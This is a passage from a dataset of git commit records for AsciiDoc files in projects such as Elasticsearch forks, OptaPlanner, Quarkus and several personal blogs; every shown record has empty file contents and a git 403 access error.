/elasticsearch,Collaborne\/elasticsearch,uschindler\/elasticsearch,lydonchandra\/elasticsearch,mmaracic\/elasticsearch,HarishAtGitHub\/elasticsearch,scorpionvicky\/elasticsearch,javachengwc\/elasticsearch,djschny\/elasticsearch,PhaedrusTheGreek\/elasticsearch,scorpionvicky\/elasticsearch,weipinghe\/elasticsearch,F0lha\/elasticsearch,myelin\/elasticsearch,tkssharma\/elasticsearch,hirdesh2008\/elasticsearch,Shekharrajak\/elasticsearch,rento19962\/elasticsearch,Siddartha07\/elasticsearch,kingaj\/elasticsearch,weipinghe\/elasticsearch,nilabhsagar\/elasticsearch,a2lin\/elasticsearch,YosuaMichael\/elasticsearch,umeshdangat\/elasticsearch,mgalushka\/elasticsearch,strapdata\/elassandra-test,lzo\/elasticsearch-1,kubum\/elasticsearch,truemped\/elasticsearch,mjason3\/elasticsearch,vingupta3\/elasticsearch,KimTaehee\/elasticsearch,jchampion\/elasticsearch,xingguang2013\/elasticsearch,fforbeck\/elasticsearch,pozhidaevak\/elasticsearch,MaineC\/elasticsearch,scorpionvicky\/elasticsearch,kalburgimanjunath\/elasticsearch,obourgain\/elasticsearch,nellicus\/elasticsearch,himanshuag\/elasticsearch,nezirus\/elasticsearch,martinstuga\/elasticsearch,queirozfcom\/elasticsearch,girirajsharma\/elasticsearch,huanzhong\/elasticsearch,Siddartha07\/elasticsearch,kimimj\/elasticsearch,LeoYao\/elasticsearch,polyfractal\/elasticsearch,JackyMai\/elasticsearch,nellicus\/elasticsearch,jbertouch\/elasticsearch,wimvds\/elasticsearch,C-Bish\/elasticsearch,Siddartha07\/elasticsearch,infusionsoft\/elasticsearch,winstonewert\/elasticsearch,pranavraman\/elasticsearch,umeshdangat\/elasticsearch,abibell\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,easonC\/elasticsearch,djschny\/elasticsearch,yongminxia\/elasticsearch,spiegela\/elasticsearch,vvcephei\/elasticsearch,kaneshin\/elasticsearch,martinstuga\/elasticsearch,phani546\/elasticsearch,hafkensite\/elasticsearch,hydro2k\/elasticsearch,lks21c\/elasticsearch,sneivandt\/elasticsearch,mgalushka\/elasticsearch,sreeramjayan\/elasticsearch,brandonkearby\/elasticsearch,hafkensite\/elasticsearch,nazarewk\/elasticsearch,vvcephei\/elasticsearch,trangvh\/elasticsearch,apepper\/elasticsearch,rhoml\/elasticsearch,loconsolutions\/elasticsearch,kalburgimanjunath\/elasticsearch,caengcjd\/elasticsearch,Liziyao\/elasticsearch,mapr\/elasticsearch,himanshuag\/elasticsearch,bawse\/elasticsearch,zhiqinghuang\/elasticsearch,Fsero\/elasticsearch,tsohil\/elasticsearch,areek\/elasticsearch,zkidkid\/elasticsearch,njlawton\/elasticsearch,Ansh90\/elasticsearch,andrejserafim\/elasticsearch,SergVro\/elasticsearch,apepper\/elasticsearch,btiernay\/elasticsearch,abibell\/elasticsearch,yongminxia\/elasticsearch,clintongormley\/elasticsearch,koxa29\/elasticsearch,IanvsPoplicola\/elasticsearch,amaliujia\/elasticsearch,humandb\/elasticsearch,kimimj\/elasticsearch,sreeramjayan\/elasticsearch,milodky\/elasticsearch,alexbrasetvik\/elasticsearch,fforbeck\/elasticsearch,mrorii\/elasticsearch,scottsom\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,dylan8902\/elasticsearch,Rygbee\/elasticsearch,btiernay\/elasticsearch,sposam\/elasticsearch,vietlq\/elasticsearch,mohit\/elasticsearch,clintongormley\/elasticsearch,davidvgalbraith\/elasticsearch,markllama\/elasticsearch,MichaelLiZhou\/elasticsearch,kenshin233\/elasticsearch,YosuaMichael\/elasticsearch,amaliujia\/elasticsearch,mjhennig\/elasticsearch,lmtwga\/elasticsearch,LewayneNaidoo\/elasticsearch,dongjoon-hyun\/elasticsearch,javachengwc\/elasticsearch,vrkansagara\/elasticsearch,Brijeshrpatel9\/elasticsearch,strapdata\/elassandra-test,wangtuo\/elasticsearch,sneivandt\/elasticsearch,GlenRSmith\/elasticsearch,fforbeck\/elasticsearch,infusionsoft\/elasticsearch,wayeast\/elasticsearch,sreeramjayan\/elasticsearch,ivansun1010\/elasticsearch,fooljohnny\/elasticsearch,mortonsykes\/elasticsearch,JSCooke\/elasticsearch,sposam\/elasticsearch,palecur\/elasticsearch,jprante\/elasticsearch,markharwood\/elasticsearch,lzo\/elasticsearch-1,aglne\/elasticsearch,vietlq\/elasticsearch,wittyameta\/elasticsearch,jsgao0\/elasticsearch,schonfeld\/elasticsearch,YosuaMichael\/elasticsearch,lchennup\/elasticsearch,mnylen\/elasticsearch,yanjunh\/elasticsearch,tkssharma\/elasticsearch,fekaputra\/elasticsearch,tkssharma\/elasticsearch,vietlq\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,amaliujia\/elasticsearch,pablocastro\/elasticsearch,lzo\/elasticsearch-1,ESamir\/elasticsearch,strapdata\/elassandra,Widen\/elasticsearch,andrejserafim\/elasticsearch,YosuaMichael\/elasticsearch,vingupta3\/elasticsearch,fekaputra\/elasticsearch,xpandan\/elasticsearch,onegambler\/elasticsearch,cnfire\/elasticsearch-1,rento19962\/elasticsearch,StefanGor\/elasticsearch,xpandan\/elasticsearch,hydro2k\/elasticsearch,kalimatas\/elasticsearch,mute\/elasticsearch,javachengwc\/elasticsearch,tkssharma\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,robin13\/elasticsearch,hechunwen\/elasticsearch,tsohil\/elasticsearch,kenshin233\/elasticsearch,kubum\/elasticsearch,kimimj\/elasticsearch,golubev\/elasticsearch,Charlesdong\/elasticsearch,koxa29\/elasticsearch,fforbeck\/elasticsearch,kevinkluge\/elasticsearch,tsohil\/elasticsearch,dataduke\/elasticsearch,mute\/elasticsearch,infusionsoft\/elasticsearch,strapdata\/elassandra-test,socialrank\/elasticsearch,wittyameta\/elasticsearch,petabytedata\/elasticsearch,jango2015\/elasticsearch,luiseduardohdbackup\/elasticsearch,njlawton\/elasticsearch,camilojd\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,wimvds\/elasticsearch,pablocastro\/elasticsearch,fooljohnny\/elasticsearch,karthikjaps\/elasticsearch,loconsolutions\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,nknize\/elasticsearch,JervyShi\/elasticsearch,MetSystem\/elasticsearch,vrkansagara\/elasticsearch,Shepard1212\/elasticsearch,dataduke\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra-test,iamjakob\/elasticsearch,humandb\/elasticsearch,pozhidaevak\/elasticsearch,likaiwalkman\/elasticsearch,Stacey-Gammon\/elasticsearch,s1monw\/elasticsearch,Rygbee\/elasticsearch,wangtuo\/elasticsearch,sc0ttkclark\/elasticsearch,jpountz\/elasticsearch,myelin\/elasticsearch,Shekharrajak\/elasticsearch,scottsom\/elasticsearch,mute\/elasticsearch,alexkuk\/elasticsearch,djschny\/elasticsearch,truemped\/elasticsearch,Collaborne\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,glefloch\/elasticsearch,mkis-\/elasticsearch,JervyShi\/elasticsearch,jbertouch\/elasticsearch,skearns64\/elasticsearch,ouyangkongtong\/elasticsearch,iacdingping\/elasticsearch,lks21c\/elasticsearch,sdauletau\/elasticsearch,kenshin233\/elasticsearch,Fsero\/elasticsearch,artnowo\/elasticsearch,karthikjaps\/elasticsearch,andrestc\/elasticsearch,rento19962\/elasticsearch,a2lin\/elasticsearch,mkis-\/elasticsearch,pritishppai\/elasticsearch,MjAbuz\/elasticsearch,pranavraman\/elasticsearch,Chhunlong\/elasticsearch,karthikjaps\/elasticsearch,jeteve\/elasticsearch,chirilo\/elasticsearch,lmtwga\/elasticsearch,njlawton\/elasticsearch,GlenRSmith\/elasticsearch,xingguang2013\/elasticsearch,brandonkearby\/elasticsearch,diendt\/elasticsearch,truemped\/elasticsearch,lydonchandra\/elasticsearch,Liziyao\/elasticsearch,yuy168\/elasticsearch,kenshin233\/elasticsearch,JackyMai\/elasticsearch,xpandan\/elasticsearch,palecur\/elasticsearch,jaynblue\/elasticsearch,TonyChai24\/ESSource,sposam\/elasticsearch,alexshadow007\/elasticsearch,btiernay\/elasticsearch,Helen-Zhao\/elasticsearch,luiseduardohdbackup\/elasticsearch,alexkuk\/elasticsearch,Flipkart\/elasticsearch,Brijeshrpatel9\/elasticsearch,jw0201\/elastic,himanshuag\/elasticsearch,18098924759\/elasticsearch,bawse\/elasticsearch,Flipkart\/elasticsearch,dylan8902\/elasticsearch,masaruh\/elasticsearch,naveenhooda2000\/elasticsearch,onegambler\/elasticsearch,easonC\/elasticsearch,nomoa\/elasticsearch,Helen-Zhao\/elasticsearch,mapr\/elasticsearch,linglaiyao1314\/elasticsearch,lks21c\/elasticsearch,alexshadow007\/elasticsearch,zkidkid\/elasticsearch,mm0\/elasticsearch,camilojd\/elasticsearch,onegambler\/elasticsearch,xuzha\/elasticsearch,strapdata\/elassandra-test,JervyShi\/elasticsearch,drewr\/elasticsearch,bawse\/elasticsearch,Uiho\/elasticsearch,hanswang\/elasticsearch,bestwpw\/elasticsearch,coding0011\/elasticsearch,sreeramjayan\/elasticsearch,Ansh90\/elasticsearch,truemped\/elasticsearch,ricardocerq\/elasticsearch,likaiwalkman\/elasticsearch,markwalkom\/elasticsearch,mgalushka\/elasticsearch,milodky\/elasticsearch,Charlesdong\/elasticsearch,F0lha\/elasticsearch,trangvh\/elasticsearch,ckclark\/elasticsearch,mute\/elasticsearch,kcompher\/elasticsearch,koxa29\/elasticsearch,dpursehouse\/elasticsearch,phani546\/elasticsearch,khiraiwa\/elasticsearch,khiraiwa\/elasticsearch,sposam\/elasticsearch,zhiqinghuang\/elasticsearch,elancom\/elasticsearch,karthikjaps\/elasticsearch,fekaputra\/elasticsearch,mcku\/elasticsearch,Ansh90\/elasticsearch,nezirus\/elasticsearch,schonfeld\/elasticsearch,AshishThakur\/elasticsearch,szroland\/elasticsearch,xingguang2013\/elasticsearch,ydsakyclguozi\/elasticsearch,ZTE-PaaS\/elasticsearch,snikch\/elasticsearch,nellicus\/elasticsearch,chirilo\/elasticsearch,markwalkom\/elasticsearch,skearns64\/elasticsearch,a2lin\/elasticsearch,thecocce\/elasticsearch,dataduke\/elasticsearch,djschny\/elasticsearch,kunallimaye\/elasticsearch,hanswang\/elasticsearch,yongminxia\/elasticsearch,palecur\/elasticsearch,vietlq\/elasticsearch,Stacey-Gammon\/elasticsearch,vingupta3\/elasticsearch,girirajsharma\/elasticsearch,vvcephei\/elasticsearch,gingerwizard\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,maddin2016\/elasticsearch,markwalkom\/elasticsearch,ImpressTV\/elasticsearch,wimvds\/elasticsearch,drewr\/elasticsearch,ckclark\/elasticsearch,geidies\/elasticsearch,GlenRSmith\/elasticsearch,strapdata\/elassandra5-rc,skearns64\/elasticsearch,wayeast\/elasticsearch,drewr\/elasticsearch,scottsom\/elasticsearch,abibell\/elasticsearch,jw0201\/elastic,javachengwc\/elasticsearch,sc0ttkclark\/elasticsearch,yongminxia\/elasticsearch,wbowling\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,Collaborne\/elasticsearch,lchennup\/elasticsearch,HonzaKral\/elasticsearch,lchennup\/elasticsearch,btiernay\/elasticsearch,mcku\/elasticsearch,markwalkom\/elasticsearch,clintongormley\/elasticsearch,weipinghe\/elasticsearch,jeteve\/elasticsearch,Brijeshrpatel9\/elasticsearch,Helen-Zhao\/elasticsearch,henakamaMSFT\/elasticsearch,StefanGor\/elasticsearch,xuzha\/elasticsearch,naveenhooda2000\/elasticsearch,henakamaMSFT\/elasticsearch,MjAbuz\/elasticsearch,mjhennig\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,masaruh\/elasticsearch,javachengwc\/elasticsearch,Charlesdong\/elasticsearch,thecocce\/elasticsearch,Ansh90\/elasticsearch,IanvsPoplicola\/elasticsearch,nomoa\/elasticsearch,kalimatas\/elasticsearch,knight1128\/elasticsearch,cwurm\/elasticsearch,knight1128\/elasticsearch,martinstuga\/elasticsearch,iacdingping\/elasticsearch,hafkensite\/elasticsearch,yynil\/elasticsearch,knight1128\/elasticsearch,C-Bish\/elasticsearch,adrianbk\/elasticsearch,obourgain\/elasticsearch,mgalushka\/elasticsearch,ydsakyclguozi\/elasticsearch,F0lha\/elasticsearch,zeroctu\/elasticsearch,AndreKR\/elasticsearch,petabytedata\/elasticsearch,HonzaKral\/elasticsearch,elasticdog\/elasticsearch,Widen\/elasticsearch,Liziyao\/elasticsearch,markllama\/elasticsearch,socialrank\/elasticsearch,LewayneNaidoo\/elasticsearch,iacdingping\/elasticsearch,wbowling\/elasticsearch,alexbrasetvik\/elasticsearch,umeshdangat\/elasticsearch,JervyShi\/elasticsearch,alexbrasetvik\/elasticsearch,ivansun1010\/elasticsearch,xpandan\/elasticsearch,sneivandt\/elasticsearch,masterweb121\/elasticsearch,wayeast\/elasticsearch,JSCooke\/elasticsearch,polyfractal\/elasticsearch,rajanm\/elasticsearch,brandonkearby\/elasticsearch,wimvds\/elasticsearch,fernandozhu\/elasticsearch,nellicus\/elasticsearch,Widen\/elasticsearch,rmuir\/elasticsearch,mohit\/elasticsearch,MisterAndersen\/elasticsearch,umeshdangat\/elasticsearch,obourgain\/elasticsearch,amit-shar\/elasticsearch,linglaiyao1314\/elasticsearch,mmaracic\/elasticsearch,phani546\/elasticsearch,kevinkluge\/elasticsearch,aglne\/elasticsearch,qwerty4030\/elasticsearch,himanshuag\/elasticsearch,lightslife\/elasticsearch,Brijeshrpatel9\/elasticsearch,nilabhsagar\/elasticsearch,NBSW\/elasticsearch,dongjoon-hyun\/elasticsearch,huanzhong\/elasticsearch,Widen\/elasticsearch,gmarz\/elasticsearch,kalimatas\/elasticsearch,queirozfcom\/elasticsearch,iamjakob\/elasticsearch,geidies\/elasticsearch,mjason3\/elasticsearch,mnylen\/elasticsearch,abibell\/elasticsearch,overcome\/elasticsearch,coding0011\/elasticsearch,Collaborne\/elasticsearch,amit-shar\/elasticsearch,huypx1292\/elasticsearch,jbertouch\/elasticsearch,TonyChai24\/ESSource,huanzhong\/elasticsearch,hydro2k\/elasticsearch,jeteve\/elasticsearch,Kakakakakku\/elasticsearch,ulkas\/elasticsearch,yongminxia\/elasticsearch,Kakakakakku\/elasticsearch,HarishAtGitHub\/elasticsearch,weipinghe\/elasticsearch,queirozfcom\/elasticsearch,pozhidaevak\/elasticsearch,spiegela\/elasticsearch,hanswang\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,MichaelLiZhou\/elasticsearch,elancom\/elasticsearch,elancom\/elasticsearch,MisterAndersen\/elasticsearch,ydsakyclguozi\/elasticsearch,fred84\/elasticsearch,MaineC\/elasticsearch,glefloch\/elasticsearch,pritishppai\/elasticsearch,elasticdog\/elasticsearch,petabytedata\/elasticsearch,djschny\/elasticsearch,himanshuag\/elasticsearch,kaneshin\/elasticsearch,mm0\/elasticsearch,sneivandt\/elasticsearch,wimvds\/elasticsearch,pranavraman\/elasticsearch,yuy168\/elasticsearch,phani546\/elasticsearch,tebriel\/elasticsearch,clintongormley\/elasticsearch,a2lin\/elasticsearch,jimhooker2002\/elasticsearch,elancom\/elasticsearch,ulkas\/elasticsearch,strapdata\/elassandra,MichaelLiZhou\/elasticsearch,winstonewert\/elasticsearch,davidvgalbraith\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,skearns64\/elasticsearch,Charlesdong\/elasticsearch,ulkas\/elasticsearch,golubev\/elasticsearch,jbertouch\/elasticsearch,amit-shar\/elasticsearch,kalburgimanjunath\/elasticsearch,18098924759\/elasticsearch,nrkkalyan\/elasticsearch,naveenhooda2000\/elasticsearch,jango2015\/elasticsearch,gmarz\/elasticsearch,chirilo\/elasticsearch,onegambler\/elasticsearch,AndreKR\/elasticsearch,ImpressTV\/elasticsearch,Flipkart\/elasticsearch,HonzaKral\/elasticsearch,yanjunh\/elasticsearch,PhaedrusTheGreek\/elasticsearch,kunallimaye\/elasticsearch,tkssharma\/elasticsearch,Collaborne\/elasticsearch,mohit\/elasticsearch,kalimatas\/elasticsearch,wbowling\/elasticsearch,nazarewk\/elasticsearch,mmaracic\/elasticsearch,jbertouch\/elasticsearch,JervyShi\/elasticsearch,ulkas\/elasticsearch,alexkuk\/elasticsearch,girirajsharma\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,lydonchandra\/elasticsearch,cnfire\/elasticsearch-1,caengcjd\/elasticsearch,mapr\/elasticsearch,petabytedata\/elasticsearch,acchen97\/elasticsearch,Shekharrajak\/elasticsearch,lchennup\/elasticsearch,mgalushka\/elasticsearch,schonfeld\/elasticsearch,amaliujia\/elasticsearch,dpursehouse\/elasticsearch,nazarewk\/elasticsearch,Chhunlong\/elasticsearch,rmuir\/elasticsearch,mmaracic\/elasticsearch,franklanganke\/elasticsearch,achow\/elasticsearch,gingerwizard\/elasticsearch,hechunwen\/elasticsearch,hirdesh2008\/elasticsearch,YosuaMichael\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Shepard1212\/elasticsearch,zkidkid\/elasticsearch","old_file":"docs\/reference\/search\/field-stats.asciidoc","new_file":"docs\/reference\/search\/field-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8e66b26b3b7a8dab1d1216a4a0e451f03eae30d9","subject":"PLANNER-315 PLANNER-319 Two shadow vars updated by the same variable listener should not require 2 variable listener instances","message":"PLANNER-315 PLANNER-319 Two shadow vars updated by the same variable listener should not require 2 variable listener instances\n","repos":"psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,bibryam\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e73adb749758273016a466ef77f0dc52fc8378b8","subject":"PLANNER-1630 Effect on BenchmarkAggregatorFrame","message":"PLANNER-1630 Effect on BenchmarkAggregatorFrame\n","repos":"droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_file":"download\/upgradeRecipe\/upgradeRecipe7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/droolsjbpm\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"855a5b8483541210fe90a6cfbbdefe63f3b8a898","subject":"Create kogito-pmml quickstart guide","message":"Create kogito-pmml quickstart guide","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/kogito-pmml.adoc","new_file":"docs\/src\/main\/asciidoc\/kogito-pmml.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a57b901580d2dd68e33162997331d26a87215101","subject":"Added the sagan adoc files","message":"Added the sagan adoc files\n","repos":"spring-cloud\/spring-cloud-bus,spring-cloud\/spring-cloud-bus","old_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_file":"docs\/src\/main\/asciidoc\/sagan-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-bus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8edb5e05ce2a87cce3ae8283442e7665ba95303f","subject":"kontrol","message":"kontrol\n","repos":"seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS,seyfullahuysal\/PCL-ROS","old_file":"Ros Gazebo\/README.adoc","new_file":"Ros Gazebo\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seyfullahuysal\/PCL-ROS.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fbc89b2140d8db2bb9bc80c78a59f5722b6a4784","subject":"Update 2017-03-10-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"939bae6af90a6ce80a0604840d2869977cc9b74d","subject":"Delete MicroServiceCasualTalk.adoc","message":"Delete MicroServiceCasualTalk.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/MicroServiceCasualTalk.adoc","new_file":"_posts\/MicroServiceCasualTalk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9000b00f99e133322531ac3c967ff17e9670c740","subject":"Link diag exc","message":"Link diag exc\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c280d6429ac89cb9e2d39713b0d30256608db7ad","subject":"Update 2016-09-23-wtf-log.adoc","message":"Update 2016-09-23-wtf-log.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-23-wtf-log.adoc","new_file":"_posts\/2016-09-23-wtf-log.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7497d06a8992124eecbad33683f4ce8b9faff85","subject":"Update 2019-01-19-Vuejs-4.adoc","message":"Update 2019-01-19-Vuejs-4.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_file":"_posts\/2019-01-19-Vuejs-4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc8f1afb2f667563ecfaa2fb0b07c9070765ad0a","subject":"Update 2016-10-14-Try-Line-Notify.adoc","message":"Update 2016-10-14-Try-Line-Notify.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_file":"_posts\/2016-10-14-Try-Line-Notify.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0ba825120ac2bddc1f91294f924505b5cef317f","subject":"y2b create post How Much Money Does Apple Pay Me?","message":"y2b create post How Much Money Does Apple Pay Me?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-04-03-How-Much-Money-Does-Apple-Pay-Me.adoc","new_file":"_posts\/2017-04-03-How-Much-Money-Does-Apple-Pay-Me.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd87d36d555f752f70bd3af5fcddcbcc0cbb8720","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6d576554f2af8d2d47386bca742b8e1f0baaa23","subject":"Update 2015-10-25-Middleman.adoc","message":"Update 2015-10-25-Middleman.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Middleman.adoc","new_file":"_posts\/2015-10-25-Middleman.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15e08af0bdf03e5c2fb82b00734db69db4515a6c","subject":"Update 2016-02-03-Attention.adoc","message":"Update 2016-02-03-Attention.adoc","repos":"jfavlam\/Concepts,jfavlam\/Concepts,jfavlam\/Concepts","old_file":"_posts\/2016-02-03-Attention.adoc","new_file":"_posts\/2016-02-03-Attention.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jfavlam\/Concepts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"706f47f3844f29ec70de7da31adb9d61384894e6","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"afe89a780c053dfc539310db898815639b517913","subject":"Update 2016-12-2-3-D.adoc","message":"Update 2016-12-2-3-D.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-D.adoc","new_file":"_posts\/2016-12-2-3-D.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd61bbc2d4288b07db1971249033b760eeea87c7","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd30bf87f134a094bb94f5243f69541b2c07b747","subject":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","message":"Update 2019-02-01-g-R-P-C-Java-Ruby.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_file":"_posts\/2019-02-01-g-R-P-C-Java-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0f335a25618d0f58306c49f27b4ce9e29782f219","subject":"Add disclaimer","message":"Add disclaimer\n\n","repos":"OpenHFT\/Chronicle-Map","old_file":"DISCLAIMER.adoc","new_file":"DISCLAIMER.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OpenHFT\/Chronicle-Map.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 